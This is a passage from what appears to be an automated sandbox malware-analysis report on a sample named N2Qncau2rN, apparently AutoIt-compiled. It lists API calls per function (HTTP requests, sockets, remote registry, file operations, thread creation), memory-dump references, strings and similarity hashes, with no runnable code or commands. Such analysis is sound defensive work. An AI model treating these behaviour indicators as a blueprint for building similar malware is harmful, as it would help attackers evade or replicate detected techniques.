                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1291720006-3916222277
                                                                                                                                                                                                                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                                                                                                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                • String ID: 0$2
                                                                                                                                                                                                                • API String ID: 93392585-3793063076
                                                                                                                                                                                                                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                                                                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004353B3
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
• String ID: crts
• API String ID: 586820018-3724388283
• Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
• Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• _wcscat.LIBCMT ref: 0044BCAF
• _wcslen.LIBCMT ref: 0044BCBB
• _wcslen.LIBCMT ref: 0044BCD1
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Strings
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
• Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
• Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
APIs
  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
• _wcslen.LIBCMT ref: 004335F2
• GetFileAttributesW.KERNEL32(?), ref: 0043361C
• GetLastError.KERNEL32 ref: 0043362B
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
• _wcsrchr.LIBCMT ref: 00433666
  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
Strings
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
• String ID: \
• API String ID: 321622961-2967466578
• Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
• Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
• Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
• Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
• Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
• Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
• Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
APIs
• GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
• LoadStringW.USER32(00000000), ref: 00434060
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
• LoadStringW.USER32(00000000), ref: 00434078
• _wprintf.LIBCMT ref: 004340A1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0043409C
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
• Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
• Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
• Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                                                                                                                • __lock.LIBCMT ref: 00417981
                                                                                                                                                                                                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                                                                                                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                                                                                                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                                                                                                                • __lock.LIBCMT ref: 004179A2
                                                                                                                                                                                                                • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                • String ID: KERNEL32.DLL$pI
                                                                                                                                                                                                                • API String ID: 637971194-197072765
                                                                                                                                                                                                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove$_malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1938898002-0
                                                                                                                                                                                                                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                                                                                                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0044B555
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0044B578
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2737351978-0
                                                                                                                                                                                                                • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                                                                                                                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00415253
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                                                                                                                • _free.LIBCMT ref: 0041529E
                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3638380555-0
                                                                                                                                                                                                                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                                                                                                                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
APIs
• VariantInit.OLEAUT32(?), ref: 0046C96E
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Variant$Copy$ClearErrorInitLast
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 3207048006-625585964
• Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
• Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
• Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
• Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00465559
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
• gethostbyname.WSOCK32(?), ref: 004655A6
• GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
• _memmove.LIBCMT ref: 004656CA
• GlobalFree.KERNEL32(00000000), ref: 0046575C
• WSACleanup.WSOCK32 ref: 00465762
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
• String ID:
• API String ID: 2945290962-0
• Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
• Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
• Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
• Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
APIs
• GetSystemMetrics.USER32(0000000F), ref: 00440527
• MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
• SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
• InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
• SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
• ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
• String ID:
• API String ID: 1457242333-0
• Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
• Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
• Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
• Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ConnectRegistry_memmove_wcslen
• String ID:
• API String ID: 15295421-0
• Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
• Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
• Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
• Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcstok.LIBCMT ref: 004675B2
